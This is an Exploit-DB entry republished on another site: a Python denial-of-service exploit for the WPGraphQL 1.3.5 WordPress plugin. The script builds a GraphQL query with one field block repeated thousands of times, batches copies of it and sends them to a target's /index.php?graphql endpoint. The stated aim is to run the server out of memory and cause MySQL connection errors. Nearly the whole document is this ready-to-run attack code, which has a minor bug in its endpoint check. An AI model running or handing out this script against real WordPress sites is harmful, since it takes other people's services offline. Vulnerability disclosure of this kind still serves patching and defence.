WordPress Plugin WPGraphQL 1.3.5 – Denial of Service - 体验盒子

作者： Dolev Farhi

日期： 2021-04-27

类别：

dos

平台：

php

来源：https://www.exploit-db.com/exploits/49807/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

# Exploit Title: WordPress Plugin WPGraphQL 1.3.5 - Denial of Service

# Author: Dolev Farhi

# Date: 2021-04-12

# Vendor Homepage: https://www.wpgraphql.com/

# Version: 1.3.5

# Tested on: Ubuntu

"""

This attack uses duplication of fields amplified by GraphQL batched queries, resulting in server OOM and MySQL connection errors.

"""

import sys

import requests

def usage():

print('* WordPress GraphQL 1.3.5 Denial of Service *')

print('python {} <wordpress_url> <number_of_field_duplications> <number_of_chained_queries>'.format(sys.argv[0]))

print('python {} http://site.com 10000 100'.format(sys.argv[0]))

sys.exit(1)

if len(sys.argv) < 4:

print('Missing arguments!')

usage()

def wpgql_exists():

try:

r = requests.post(WORDPRESS_URL, json='x')

if 'GraphQL' in r.json()['errors'][0]['message']:

return True

except:

pass

return False

# This PoC assumes graphql is located at index.php?graphql

WORDPRESS_URL = sys.argv[1] + '/index.php?graphql'

FORCE_MULTIPLIER = int(sys.argv[2])

CHAINED_REQUESTS = int(sys.argv[3])

if wpgql_exists is False:

print('Could not identify GraphQL running at "/index.php?graphql"')

sys.exit(1)

queries = []

payload = 'content \n comments { \n nodes { \n content } }' * FORCE_MULTIPLIER

query = {'query':'query { \n posts { \n nodes { \n ' + payload + '} } }'}

for _ in range(0, CHAINED_REQUESTS):

queries.append(query)

r = requests.post(WORDPRESS_URL, json=queries)

print('Time took: {} seconds '.format(r.elapsed.total_seconds()))

print('Response:', r.json())